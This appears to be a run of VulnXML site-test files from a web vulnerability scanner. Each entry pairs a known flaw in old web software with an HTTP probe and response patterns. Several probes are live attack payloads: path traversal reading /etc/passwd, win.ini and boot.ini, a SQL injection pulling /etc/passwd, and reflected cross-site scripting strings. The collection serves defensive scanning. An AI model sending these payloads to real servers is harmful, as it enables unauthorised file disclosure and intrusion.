spkproxy/VulnXML/SiteTests/sitetest-749.xml0100664000076500007650000000717407566204543017601 0ustar davedave (com.unify.servletexec.UploadServlet) "This servlet allows attackers to upload files to the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-74.xml0100664000076500007650000000717307566204543017507 0ustar davedave (index.html) "This may be a default SuSe Apache install. This is the support page." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /docs/sdb/en/html/index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Support Database 200 Support Database 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-750.xml0100664000076500007650000000712407566204543017564 0ustar davedave (Counter) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/Counter HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-751.xml0100664000076500007650000000713407566204543017566 0ustar davedave (DateServlet) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/DateServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-752.xml0100664000076500007650000000714007566204543017564 0ustar davedave (FingerServlet) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/FingerServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-753.xml0100664000076500007650000000715007566204543017566 0ustar davedave (HelloWorldServlet) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/HelloWorldServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-754.xml0100664000076500007650000000702407566204543017567 0ustar davedave (IsItWorking) GET 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/IsItWorking HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Ye 200 Ye 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-755.xml0100664000076500007650000000714207566204543017571 0ustar davedave (SessionServlet) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/SessionServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-756.xml0100664000076500007650000000714007566204543017570 0ustar davedave (SimpleServlet) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/SimpleServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-757.xml0100664000076500007650000000713607566204543017576 0ustar davedave (SnoopServlet) "JRun default servlet found. All default code should be removed from servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/SnoopServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-758.xml0100664000076500007650000000715407566204543017577 0ustar davedave (sunexamples.BBoardServlet) "This default servlet lets attackers execute arbitrary commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/sunexamples.BBoardServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-759.xml0100664000076500007650000000703707566204543017600 0ustar davedave (admnlogin) "SessionServlet Output 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /session/admnlogin HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-75.xml0100664000076500007650000000736307566204543017511 0ustar davedave (%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini) "Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [windows] 200 [windows] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-760.xml0100664000076500007650000000715707566204543017573 0ustar davedave (metacart.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shop/database/metacart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-761.xml0100664000076500007650000000715107566204543017566 0ustar davedave (shop.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shoponline/fpdb/shop.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-762.xml0100664000076500007650000000716307566204543017572 0ustar davedave (metacart.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shopping/database/metacart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-763.xml0100664000076500007650000000716707566204543017577 0ustar davedave (midicart.mdb) "MIDICART database is available for browsing. This should not be allowed via the web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /shoppingdirectory/midicart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-764.xml0100664000076500007650000000720507566204543017571 0ustar davedave (?access-mode=text) "The SilverStream database structure is available for remote viewing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ _DBProduct 200 _DBProduct 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-765.xml0100664000076500007650000000716107566204543017573 0ustar davedave ("' UNION ALL SELECT FileToClob('/etc/passwd') "root:" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /site/"' UNION ALL SELECT FileToClob('/etc/passwd' HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 'server'\)\:\:html 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 'server'\)\:\:html spkproxy/VulnXML/SiteTests/sitetest-766.xml0100664000076500007650000000716107566204543017574 0ustar davedave ("' UNION ALL SELECT FileToClob('/etc/passwd') "root:" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /site/"' UNION ALL SELECT FileToClob('/etc/passwd' HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 'server'\)\:\:html 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 'server'\)\:\:html spkproxy/VulnXML/SiteTests/sitetest-767.xml0100664000076500007650000000721107566204543017571 0ustar davedave (SiteScope.html) "The SiteScope install may allow remote users to get sensitive information about the hosts being monitored." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteScope/htdocs/SiteScope.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-768.xml0100664000076500007650000000753607566204543017604 0ustar davedave (index.php?action=storenew&username=<script>alert('Vulnerable')</script>) "SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-769.xml0100664000076500007650000000730407566204543017576 0ustar davedave (common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd) "This CGI allows attackers to read files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-76.xml0100664000076500007650000000735307566204543017511 0ustar davedave (%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini) "Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-770.xml0100664000076500007650000000774107566204543017573 0ustar davedave (index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;) "MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-771.xml0100664000076500007650000000773707566204543017601 0ustar davedave (index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;) "MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-772.xml0100664000076500007650000000775107566204543017576 0ustar davedave (index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;) "MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-773.xml0100664000076500007650000000732207566204543017571 0ustar davedave (sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini) "Default scripts can allow arbitrary access to the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-774.xml0100664000076500007650000000706007566204543017571 0ustar davedave (submit.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /users/scripts/submit.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-775.xml0100664000076500007650000000726007566204543017574 0ustar davedave (web.xml) "Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WEB-INF./web.xml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-776.xml0100664000076500007650000000721507566204543017575 0ustar davedave (orders/import.txt) "This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart-lite/orders/import.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-777.xml0100664000076500007650000000720607566204543017576 0ustar davedave (import.txt) "This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart-lite/config/import.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-778.xml0100664000076500007650000000716107566204543017577 0ustar davedave (carts/) "This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart/carts/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-779.xml0100664000076500007650000000716307566204543017602 0ustar davedave (config/) "This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart/config/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-77.xml0100664000076500007650000000722607566204543017511 0ustar davedave (HTTP_NOT_FOUND.html.var) "Apache reveals file system paths when invalid error documents are requested." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /error/HTTP_NOT_FOUND.html.var HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Available variants 200 Available variants 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-780.xml0100664000076500007650000000721207566204543017565 0ustar davedave (config/clients.txt) "This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." 0.0 .* 